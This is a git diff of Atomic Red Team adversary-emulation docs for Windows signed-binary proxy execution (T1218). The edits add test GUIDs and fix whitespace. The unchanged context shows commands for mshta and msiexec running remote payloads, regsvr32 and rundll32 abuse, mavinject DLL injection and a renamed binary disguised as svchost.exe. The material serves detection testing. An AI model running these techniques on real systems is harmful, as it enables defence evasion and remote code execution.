| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -550,7 +578,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -571,10 +599,14 @@ will be displayed, along with other information about the opperation. "The trans
**Supported Platforms:** Windows
+**auto_generated_guid:** 559e6d06-bb42-4307-bff7-3b95a8254bad
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
@@ -631,7 +663,7 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 077398a1..8682f1e1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -39,10 +39,14 @@ Test execution of a remote script using mshta.exe. Upon execution calc.exe will
**Supported Platforms:** Windows
+**auto_generated_guid:** 1483fab9-4f52-4217-a9ce-daa9d7747cae
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct|
@@ -70,6 +74,10 @@ Upon execution, a new PowerShell windows will be opened that displays user infor
**Supported Platforms:** Windows
+**auto_generated_guid:** 906865c3-e05f-4acc-85c4-fbc185455095
+
+
+
@@ -94,10 +102,14 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
**Supported Platforms:** Windows
+**auto_generated_guid:** c4b97eeb-5249-4455-a607-59f95485cb45
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| temp_file | temp_file location for hta | string | $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta|
| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta|
@@ -130,10 +142,14 @@ Executes an HTA Application using JScript script engine using local UNC path sim
**Supported Platforms:** Windows
+**auto_generated_guid:** 007e5672-2088-4853-a562-7490ddc19447
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_engine | Script Engine to use | string | JScript|
| hta_file_path | HTA file name and or path to be used | string | Test.hta|
@@ -156,7 +172,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -175,10 +191,14 @@ Executes an HTA Application using JScript script engine simulating double click.
**Supported Platforms:** Windows
+**auto_generated_guid:** 58a193ec-131b-404e-b1ca-b35cf0b18c33
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_engine | Script Engine to use | string | JScript|
| hta_file_path | HTA file name and or path to be used | string | Test.hta|
@@ -200,7 +220,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -219,10 +239,14 @@ Executes an HTA Application by directly downloading from remote URI.
**Supported Platforms:** Windows
+**auto_generated_guid:** 39ceed55-f653-48ac-bd19-aceceaf525db
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
@@ -244,7 +268,7 @@ Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -263,10 +287,14 @@ Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Ha
**Supported Platforms:** Windows
+**auto_generated_guid:** e7e3a525-7612-4d68-a5d3-c4649181b8af
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe|
| script_engine | Script Engine to use | string | JScript|
@@ -289,7 +317,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -308,10 +336,14 @@ Executes an HTA Application with JScript Engine and Inline Protocol Handler.
**Supported Platforms:** Windows
+**auto_generated_guid:** d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
| script_engine | Script Engine to use | string | JScript|
@@ -334,7 +366,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -353,10 +385,14 @@ Executes an HTA Application with Simulate lateral movement over UNC Path.
**Supported Platforms:** Windows
+**auto_generated_guid:** b8a8bdb2-7eae-490d-8251-d5e0295b2362
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
@@ -377,7 +413,7 @@ Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_fil
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 44f8b860..6af04be4 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -21,10 +21,14 @@ Execute arbitrary MSI file. Commonly seen in application installation. The MSI o
**Supported Platforms:** Windows
+**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi|
@@ -43,7 +47,7 @@ msiexec.exe /q /i "#{msi_payload}"
##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -62,10 +66,14 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
**Supported Platforms:** Windows
+**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi|
@@ -93,10 +101,14 @@ By default, if the src folder is not in place, it will download the 64 bit versi
**Supported Platforms:** Windows
+**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll|
@@ -115,7 +127,7 @@ msiexec.exe /y "#{dll_payload}"
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index be140831..4f5b72e6 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -18,10 +18,14 @@ Execute arbitrary DLL file stored locally.
**Supported Platforms:** Windows
+**auto_generated_guid:** 2430498b-06c0-4b92-a448-8ad263c388e2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll|
@@ -40,7 +44,7 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md
index 0ee1701a..d2b8d2e2 100644
--- a/atomics/T1218.009/T1218.009.md
+++ b/atomics/T1218.009/T1218.009.md
@@ -19,10 +19,14 @@ Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shou
**Supported Platforms:** Windows
+**auto_generated_guid:** 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location of the payload | Path | %tmp%\T1218.009.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1}
+if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -68,10 +72,14 @@ along with other information about the assembly being installed.
**Supported Platforms:** Windows
+**auto_generated_guid:** fd3c1c6a-02d2-4b72-82d9-71c527abb126
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location of the payload | Path | $Env:TEMP\T1218.009.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs|
@@ -102,7 +110,7 @@ Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1}
+if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md
index 043c0a8c..b2a345a8 100644
--- a/atomics/T1218.010/T1218.010.md
+++ b/atomics/T1218.010/T1218.010.md
@@ -27,10 +27,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
+**auto_generated_guid:** 449aa403-6aba-47ce-8a37-247d21ef0306
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct|
| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32|
@@ -51,7 +55,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
##### Description: Regsvr32.sct must exist on disk at specified location (#(unknown))
##### Check Prereq Commands:
```powershell
-if (Test-Path #(unknown)) {exit 0} else {exit 1}
+if (Test-Path #(unknown)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -72,10 +76,14 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
**Supported Platforms:** Windows
+**auto_generated_guid:** c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct|
| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32|
@@ -103,10 +111,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
+**auto_generated_guid:** 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll|
| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32|
@@ -127,7 +139,7 @@ IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dl
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_name}) {exit 0} else {exit 1}
+if (Test-Path #{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -147,10 +159,14 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte
**Supported Platforms:** Windows
+**auto_generated_guid:** 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_file | Path to renamed dll file to be registered | Path | %temp%\shell32.jpg|
| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32|
@@ -175,7 +191,7 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte
##### Description: Test requires a renamed dll file
##### Check Prereq Commands:
```cmd
-if exist #{dll_file} ( exit 0 ) else ( exit 1 )
+if exist #{dll_file} ( exit 0 ) else ( exit 1 )
```
##### Get Prereq Commands:
```cmd
@@ -194,10 +210,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
+**auto_generated_guid:** 9d71c492-ea2e-4c08-af16-c6994cdf029f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll|
| regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32|
@@ -218,7 +238,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_name}) {exit 0} else {exit 1}
+if (Test-Path #{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index a49be86f..ce2c66cb 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -33,10 +33,14 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct|
@@ -64,10 +68,14 @@ Upon execution calc.exe will be launched
**Supported Platforms:** Windows
+**auto_generated_guid:** 638730e7-7aed-43dc-bf8c-8117f805f5bb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command for rundll32.exe to execute | string | calc.exe|
@@ -95,10 +103,14 @@ Upon execution calc.exe will be launched
**Supported Platforms:** Windows
+**auto_generated_guid:** d91cae26-7fc1-457b-a854-34c8aad48c89
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf|
@@ -117,7 +129,7 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -140,10 +152,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
+**auto_generated_guid:** 5e46a58e-cbf6-45ef-a289-ed7754603df9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf|
@@ -162,7 +178,7 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -184,10 +200,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
+**auto_generated_guid:** 41fa324a-3946-401e-bbdd-d7991c628125
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf|
@@ -206,7 +226,7 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -228,10 +248,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
+**auto_generated_guid:** 71d771cd-d6b3-4f34-bc76-a63d47a10b19
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf|
@@ -250,7 +274,7 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -275,6 +299,10 @@ In this atomic, the sample hta file opens the calculator and the vbs file shows
**Supported Platforms:** Windows
+**auto_generated_guid:** 22cfde89-befe-4e15-9753-47306b37a6e3
+
+
+
@@ -300,10 +328,14 @@ Executes the LaunchApplication function in pcwutl.dll to proxy execution of an e
**Supported Platforms:** Windows
+**auto_generated_guid:** 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_to_launch | Path of the executable to launch | path | %windir%\System32\notepad.exe|
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 5e7cdbfd..49ffa97d 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -29,10 +29,14 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win
**Supported Platforms:** Windows
+**auto_generated_guid:** c426dacf-575d-4937-8611-a148a86a5e61
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_id | PID of process receiving injection | string | 1000|
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll|
@@ -52,7 +56,7 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -72,10 +76,14 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires
**Supported Platforms:** Windows
+**auto_generated_guid:** d590097e-d402-44e2-ad72-2c6aa1ce78b1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
@@ -101,10 +109,14 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can
**Supported Platforms:** Windows
+**auto_generated_guid:** ad2c17ed-f626-4061-b21e-b9804a6f3655
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
@@ -123,7 +135,7 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -145,10 +157,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/I
**Supported Platforms:** Windows
+**auto_generated_guid:** 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf|
@@ -167,7 +183,7 @@ InfDefaultInstall.exe #{inf_to_execute}
##### Description: INF file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -187,10 +203,14 @@ Emulates attack via documents through protocol handler in Microsoft Office. On
**Supported Platforms:** Windows
+**auto_generated_guid:** db020456-125b-4c8b-a4a7-487df8afb5a2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx|
@@ -210,7 +230,7 @@ call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
##### Check Prereq Commands:
```powershell
-if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
+if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -229,10 +249,14 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha
**Supported Platforms:** Windows
+**auto_generated_guid:** 7cbb0f26-a4c1-4f77-b180-a009aa05637e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
| mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319|
@@ -253,7 +277,7 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha
##### Description: .Net must be installed for this test to work correctly.
##### Check Prereq Commands:
```powershell
-if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
+if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -272,10 +296,14 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as
**Supported Platforms:** Windows
+**auto_generated_guid:** 4cc40fd7-87b8-4b16-b2d7-57534b86b911
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
| renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe|
@@ -298,7 +326,7 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as
##### Check Prereq Commands:
```powershell
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
-if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -325,10 +353,14 @@ Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHa
**Supported Platforms:** Windows
+**auto_generated_guid:** 9ebe7901-7edf-45c0-b5c7-8366300919db
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo|
| module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD|
@@ -350,7 +382,7 @@ Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218/src/Infdefaultinstall.inf b/atomics/T1218/src/Infdefaultinstall.inf
index 57d45ecf..49ee5872 100644
--- a/atomics/T1218/src/Infdefaultinstall.inf
